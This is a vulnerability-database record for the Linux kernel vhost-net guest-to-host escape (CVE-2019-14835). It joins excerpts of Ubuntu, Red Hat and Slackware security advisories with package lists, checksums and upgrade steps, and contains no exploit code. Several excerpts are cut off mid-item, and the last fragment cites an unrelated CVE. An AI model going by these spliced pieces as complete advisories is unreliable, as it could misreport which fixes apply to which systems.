"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "167746"
},
{
"db": "PACKETSTORM",
"id": "167886"
},
{
"db": "PACKETSTORM",
"id": "167694"
}
],
"trust": 0.3
},
"title": {
"_id": null,
"data": "Linux\u00a0Kernel\u00a0 Authentication vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "arbitrary",
"sources": [
{
"db": "PACKETSTORM",
"id": "167746"
},
{
"db": "PACKETSTORM",
"id": "167886"
},
{
"db": "PACKETSTORM",
"id": "167694"
}
],
"trust": 0.3
}
}
VAR-201909-0695
Vulnerability from variot - Updated: 2026-03-09 20:38A buffer overflow flaw was found, in versions from 2.6.34 to 5.2.x, in the way Linux kernel's vhost functionality that translates virtqueue buffers to IOVs, logged the buffer descriptors during migration. A privileged guest user able to pass descriptors with invalid length to the host when migration is underway, could use this flaw to increase their privileges on the host. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. 6.5) - x86_64
- (CVE-2019-14835)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. ========================================================================== Kernel Live Patch Security Notice 0058-1 October 22, 2019
linux vulnerability
A security issue affects these releases of Ubuntu:
| Series | Base kernel | Arch | flavors | |------------------+--------------+----------+------------------| | Ubuntu 18.04 LTS | 4.15.0 | amd64 | aws | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | generic | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | lowlatency | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | oem | | Ubuntu 18.04 LTS | 5.0.0 | amd64 | azure | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | lowlatency | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | aws | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | lowlatency | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | azure | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | generic | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | lowlatency |
Summary:
Several security issues were fixed in the kernel.
Software Description: - linux: Linux kernel
Details:
It was discovered that a race condition existed in the GFS2 file system in the Linux kernel. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2016-10905)
It was discovered that a use-after-free error existed in the block layer subsystem of the Linux kernel when certain failure conditions occurred. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-20856)
It was discovered that the USB gadget Midi driver in the Linux kernel contained a double-free vulnerability when handling certain error conditions. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-20961)
It was discovered that the XFS file system in the Linux kernel did not properly handle mount failures in some situations. A local attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2018-20976)
It was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not did not handle detach operations correctly, leading to a use-after-free vulnerability. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-21008)
It was discovered that the Intel Wi-Fi device driver in the Linux kernel did not properly validate certain Tunneled Direct Link Setup (TDLS). A physically proximate attacker could use this to cause a denial of service (Wi-Fi disconnect). (CVE-2019-0136)
It was discovered that the Linux kernel on ARM processors allowed a tracing process to modify a syscall after a seccomp decision had been made on that syscall. A local attacker could possibly use this to bypass seccomp restrictions. (CVE-2019-2054)
It was discovered that an integer overflow existed in the Binder implementation of the Linux kernel, leading to a buffer overflow. A local attacker could use this to escalate privileges. (CVE-2019-2181)
It was discovered that the Marvell Wireless LAN device driver in the Linux kernel did not properly validate the BSS descriptor. A local attacker could possibly use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-3846)
It was discovered that a heap buffer overflow existed in the Marvell Wireless LAN device driver for the Linux kernel. An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-10126)
It was discovered that the Bluetooth UART implementation in the Linux kernel did not properly check for missing tty operations. A local attacker could use this to cause a denial of service. (CVE-2019-10207)
Jonathan Looney discovered that an integer overflow existed in the Linux kernel when handling TCP Selective Acknowledgments (SACKs). A remote attacker could use this to cause a denial of service (system crash). (CVE-2019-11477)
Jonathan Looney discovered that the TCP retransmission queue implementation in the Linux kernel could be fragmented when handling certain TCP Selective Acknowledgment (SACK) sequences. A remote attacker could use this to cause a denial of service. (CVE-2019-11478)
It was discovered that the ext4 file system implementation in the Linux kernel did not properly zero out memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2019-11833)
It was discovered that the PowerPC dlpar implementation in the Linux kernel did not properly check for allocation errors in some situations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2019-12614)
It was discovered that the floppy driver in the Linux kernel did not properly validate meta data, leading to a buffer overread. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14283)
It was discovered that the floppy driver in the Linux kernel did not properly validate ioctl() calls, leading to a division-by-zero. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14284)
Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14814)
Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14815)
Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14816)
Matt Delco discovered that the KVM hypervisor implementation in the Linux kernel did not properly perform bounds checking when handling coalesced MMIO write operations. A local attacker with write access to /dev/kvm could use this to cause a denial of service (system crash). (CVE-2019-14821)
Peter Pi discovered a buffer overflow in the virtio network backend (vhost_net) implementation in the Linux kernel. (CVE-2019-14835)
Update instructions:
The problem can be corrected by updating your livepatches to the following versions:
| Kernel | Version | flavors | |--------------------------+----------+--------------------------| | 4.4.0-148.174 | 58.1 | lowlatency, generic | | 4.4.0-148.174~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-150.176 | 58.1 | generic, lowlatency | | 4.4.0-150.176~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-151.178 | 58.1 | lowlatency, generic | | 4.4.0-151.178~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-154.181 | 58.1 | lowlatency, generic | | 4.4.0-154.181~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-157.185 | 58.1 | lowlatency, generic | | 4.4.0-157.185~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-159.187 | 58.1 | lowlatency, generic | | 4.4.0-159.187~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-161.189 | 58.1 | lowlatency, generic | | 4.4.0-161.189~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-164.192 | 58.1 | lowlatency, generic | | 4.4.0-164.192~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-165.193 | 58.1 | generic, lowlatency | | 4.4.0-1083.93 | 58.1 | aws | | 4.4.0-1084.94 | 58.1 | aws | | 4.4.0-1085.96 | 58.1 | aws | | 4.4.0-1087.98 | 58.1 | aws | | 4.4.0-1088.99 | 58.1 | aws | | 4.4.0-1090.101 | 58.1 | aws | | 4.4.0-1092.103 | 58.1 | aws | | 4.4.0-1094.105 | 58.1 | aws | | 4.15.0-50.54 | 58.1 | generic, lowlatency | | 4.15.0-50.54~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-51.55 | 58.1 | generic, lowlatency | | 4.15.0-51.55~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-52.56 | 58.1 | lowlatency, generic | | 4.15.0-52.56~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-54.58 | 58.1 | generic, lowlatency | | 4.15.0-54.58~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-55.60 | 58.1 | generic, lowlatency | | 4.15.0-58.64 | 58.1 | generic, lowlatency | | 4.15.0-58.64~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-60.67 | 58.1 | lowlatency, generic | | 4.15.0-60.67~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-62.69 | 58.1 | generic, lowlatency | | 4.15.0-62.69~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-64.73 | 58.1 | generic, lowlatency | | 4.15.0-64.73~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-65.74 | 58.1 | lowlatency, generic | | 4.15.0-1038.43 | 58.1 | oem | | 4.15.0-1039.41 | 58.1 | aws | | 4.15.0-1039.44 | 58.1 | oem | | 4.15.0-1040.42 | 58.1 | aws | | 4.15.0-1041.43 | 58.1 | aws | | 4.15.0-1043.45 | 58.1 | aws | | 4.15.0-1043.48 | 58.1 | oem | | 4.15.0-1044.46 | 58.1 | aws | | 4.15.0-1045.47 | 58.1 | aws | | 4.15.0-1045.50 | 58.1 | oem | | 4.15.0-1047.49 | 58.1 | aws | | 4.15.0-1047.51 | 58.1 | azure | | 4.15.0-1048.50 | 58.1 | aws | | 4.15.0-1049.54 | 58.1 | azure | | 4.15.0-1050.52 | 58.1 | aws | | 4.15.0-1050.55 | 58.1 | azure | | 4.15.0-1050.57 | 58.1 | oem | | 4.15.0-1051.53 | 58.1 | aws | | 4.15.0-1051.56 | 58.1 | azure | | 4.15.0-1052.57 | 58.1 | azure | | 4.15.0-1055.60 | 58.1 | azure | | 4.15.0-1056.61 | 58.1 | azure | | 4.15.0-1056.65 | 58.1 | oem | | 4.15.0-1057.62 | 58.1 | azure | | 4.15.0-1057.66 | 58.1 | oem | | 4.15.0-1059.64 | 58.1 | azure | | 5.0.0-1014.14~18.04.1 | 58.1 | azure | | 5.0.0-1016.17~18.04.1 | 58.1 | azure | | 5.0.0-1018.19~18.04.1 | 58.1 | azure | | 5.0.0-1020.21~18.04.1 | 58.1 | azure |
Support Information:
Kernels older than the levels listed below do not receive livepatch updates. Please upgrade your kernel as soon as possible.
| Series | Version | Flavors | |------------------+------------------+--------------------------| | Ubuntu 18.04 LTS | 4.15.0-1039 | aws | | Ubuntu 16.04 LTS | 4.4.0-1083 | aws | | Ubuntu 18.04 LTS | 5.0.0-1000 | azure | | Ubuntu 16.04 LTS | 4.15.0-1047 | azure | | Ubuntu 18.04 LTS | 4.15.0-50 | generic lowlatency | | Ubuntu 16.04 LTS | 4.15.0-50 | generic lowlatency | | Ubuntu 14.04 LTS | 4.4.0-148 | generic lowlatency | | Ubuntu 18.04 LTS | 4.15.0-1038 | oem | | Ubuntu 16.04 LTS | 4.4.0-148 | generic lowlatency |
References: CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, CVE-2019-14821, CVE-2019-14835
-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: kernel security update Advisory ID: RHSA-2019:2866-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:2866 Issue date: 2019-09-23 CVE Names: CVE-2019-14835 ==================================================================== 1. Summary:
An update for kernel is now available for Red Hat Enterprise Linux 7.5 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux ComputeNode EUS (v. 7.5) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.5) - x86_64 Red Hat Enterprise Linux Server EUS (v. 7.5) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 7.5) - ppc64, ppc64le, x86_64
-
(CVE-2019-14835)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1750727 - CVE-2019-14835 kernel: vhost-net: guest to host kernel escape during migration
- Package List:
Red Hat Enterprise Linux ComputeNode EUS (v. 7.5):
Source: kernel-3.10.0-862.41.2.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-862.41.2.el7.noarch.rpm kernel-doc-3.10.0-862.41.2.el7.noarch.rpm
x86_64: kernel-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm kernel-devel-3.10.0-862.41.2.el7.x86_64.rpm kernel-headers-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-862.41.2.el7.x86_64.rpm perf-3.10.0-862.41.2.el7.x86_64.rpm perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm python-perf-3.10.0-862.41.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.5):
x86_64: kernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-862.41.2.el7.x86_64.rpm perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 7.5):
Source: kernel-3.10.0-862.41.2.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-862.41.2.el7.noarch.rpm kernel-doc-3.10.0-862.41.2.el7.noarch.rpm
ppc64: kernel-3.10.0-862.41.2.el7.ppc64.rpm kernel-bootwrapper-3.10.0-862.41.2.el7.ppc64.rpm kernel-debug-3.10.0-862.41.2.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-debug-devel-3.10.0-862.41.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-862.41.2.el7.ppc64.rpm kernel-devel-3.10.0-862.41.2.el7.ppc64.rpm kernel-headers-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-libs-3.10.0-862.41.2.el7.ppc64.rpm perf-3.10.0-862.41.2.el7.ppc64.rpm perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm python-perf-3.10.0-862.41.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm
ppc64le: kernel-3.10.0-862.41.2.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debug-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-862.41.2.el7.ppc64le.rpm kernel-devel-3.10.0-862.41.2.el7.ppc64le.rpm kernel-headers-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-libs-3.10.0-862.41.2.el7.ppc64le.rpm perf-3.10.0-862.41.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm python-perf-3.10.0-862.41.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm
s390x: kernel-3.10.0-862.41.2.el7.s390x.rpm kernel-debug-3.10.0-862.41.2.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.s390x.rpm kernel-debug-devel-3.10.0-862.41.2.el7.s390x.rpm kernel-debuginfo-3.10.0-862.41.2.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-862.41.2.el7.s390x.rpm kernel-devel-3.10.0-862.41.2.el7.s390x.rpm kernel-headers-3.10.0-862.41.2.el7.s390x.rpm kernel-kdump-3.10.0-862.41.2.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-862.41.2.el7.s390x.rpm kernel-kdump-devel-3.10.0-862.41.2.el7.s390x.rpm perf-3.10.0-862.41.2.el7.s390x.rpm perf-debuginfo-3.10.0-862.41.2.el7.s390x.rpm python-perf-3.10.0-862.41.2.el7.s390x.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.s390x.rpm
x86_64: kernel-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm kernel-devel-3.10.0-862.41.2.el7.x86_64.rpm kernel-headers-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-862.41.2.el7.x86_64.rpm perf-3.10.0-862.41.2.el7.x86_64.rpm perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm python-perf-3.10.0-862.41.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional EUS (v. 7.5):
ppc64: kernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-862.41.2.el7.ppc64.rpm perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm
ppc64le: kernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debug-devel-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-862.41.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm
x86_64: kernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-862.41.2.el7.x86_64.rpm perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2019-14835 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/kernel-vhost
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXYiswNzjgjWX9erEAQhd1g//WDRHc/Prfvv6JNbmMdvxJvpXZx3Wc535 /AQUarXoBalyktM8ucRBOg28X4Eq7Y8WF9jbdoyp8iIrirZQdA7+4yEI6O6GnY2m M3sx6Kw9jbNFxP72zUxOK6hMuR8pimz0RWIdc8vQgfA3UuTyjjfvHjjr361FCRHF bjRgMl4sOuMbwrxs/h6NgeKVLUw5EoHTrJ6Hc8Vv5wIjyir1bSMH0aikAirkoZ0Y WtR3Z7lvODMcY4wKXecyVc/xslg1ioZhS9gGsG+TJ2fUMw7sZr5ERccc+1UWGFUa 2knyaFEQUSEYweDEsYm3zR3G75rNljzX8VZaEN/ShQwIA46k8J/Z7Wdy7DC6e66/ FUOKdD8MEjOieoDLfXZpOlBJ1UWBCC8/HYuP7ujFpiCvN7zFBd/HYAIUnhC+y5wg XHTc05QJbalfHAntTQRzlwS8Uc746PjBlykrWETVFwyVu3u1cfxbSYsP4TA/6yvE AUK1uea0hbg6RgaceZfyIV8YIaaJB5fmS4Ula4p4ppBf5HuF+L0eRl5zYzhA0Ryl NSNr5YeIrmCVr6UjEBNZlClSOwi4RN2pQ1VmAcbrsACYuOcKVD1PtoCH087ISIjP Lej+FZxY423yc9s1/2RxoVIgYwInTzttvauDR8ws4bDmxbPzWrlpT7ciee5kdSQr jZmQ2x5ylP4=z5bF -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/linux-4.4.199/: Upgraded. These updates fix various bugs and security issues. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 4.4.191: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10906 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10905 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10638 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15117 Fixed in 4.4.193: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835 Fixed in 4.4.194: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14816 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14814 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15505 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821 Fixed in 4.4.195: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17053 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17052 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17056 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17055 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17054 Fixed in 4.4.196: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215 Fixed in 4.4.197: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16746 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20976 Fixed in 4.4.198: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17075 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17133 Fixed in 4.4.199: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15098 ( Security fix *) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199_smp-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199_smp-noarch-1.txz
Updated packages for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199-noarch-1.txz
MD5 signatures: +-------------+
Slackware 14.2 packages:
0e523f42e759ecc2399f36e37672f110 kernel-generic-4.4.199-i586-1.txz ee6451f5362008b46fee2e08e3077b21 kernel-generic-smp-4.4.199_smp-i686-1.txz a8338ef88f2e3ea9c74d564c36ccd420 kernel-headers-4.4.199_smp-x86-1.txz cd9e9c241e4eec2fba1dae658a28870e kernel-huge-4.4.199-i586-1.txz 842030890a424023817d42a83a86a7f4 kernel-huge-smp-4.4.199_smp-i686-1.txz 257db024bb4501548ac9118dbd2d9ae6 kernel-modules-4.4.199-i586-1.txz 96377cbaf7bca55aaca70358c63151a7 kernel-modules-smp-4.4.199_smp-i686-1.txz 0673e86466f9e624964d95107cf6712f kernel-source-4.4.199_smp-noarch-1.txz
Slackware x86_64 14.2 packages: 6d1ff428e7cad6caa8860acc402447a1 kernel-generic-4.4.199-x86_64-1.txz dadc091dc725b8227e0d1e35098d6416 kernel-headers-4.4.199-x86-1.txz f5f4c034203f44dd1513ad3504c42515 kernel-huge-4.4.199-x86_64-1.txz a5337cd8b2ca80d4d93b9e9688e42b03 kernel-modules-4.4.199-x86_64-1.txz 5dd6e46c04f37b97062dc9e52cc38add kernel-source-4.4.199-noarch-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg kernel-*.txz
If you are using an initrd, you'll need to rebuild it.
For a 32-bit SMP machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):
/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199-smp | bash
For a 64-bit machine, or a 32-bit uniprocessor machine, use this command (substitute the appropriate kernel version if you are not running Slackware 14.2):
/usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199 | bash
Please note that "uniprocessor" has to do with the kernel you are running, not with the CPU. Most systems should run the SMP kernel (if they can) regardless of the number of cores the CPU has. If you aren't sure which kernel you are running, run "uname -a". If you see SMP there, you are running the SMP kernel and should use the 4.4.199-smp version when running mkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit systems should always use 4.4.199 as the version.
If you are using lilo or elilo to boot the machine, you'll need to ensure that the machine is properly prepared before rebooting.
If using LILO: By default, lilo.conf contains an image= line that references a symlink that always points to the correct kernel. No editing should be required unless your machine uses a custom lilo.conf. If that is the case, be sure that the image= line references the correct kernel file. Either way, you'll need to run "lilo" as root to reinstall the boot loader.
If using elilo: Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wish to use, and then run eliloconfig to update the EFI System Partition.
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
The following packages have been upgraded to a later upstream version: redhat-release-virtualization-host (4.2), redhat-virtualization-host (4.2). (CVE-2019-15031)
Update instructions:
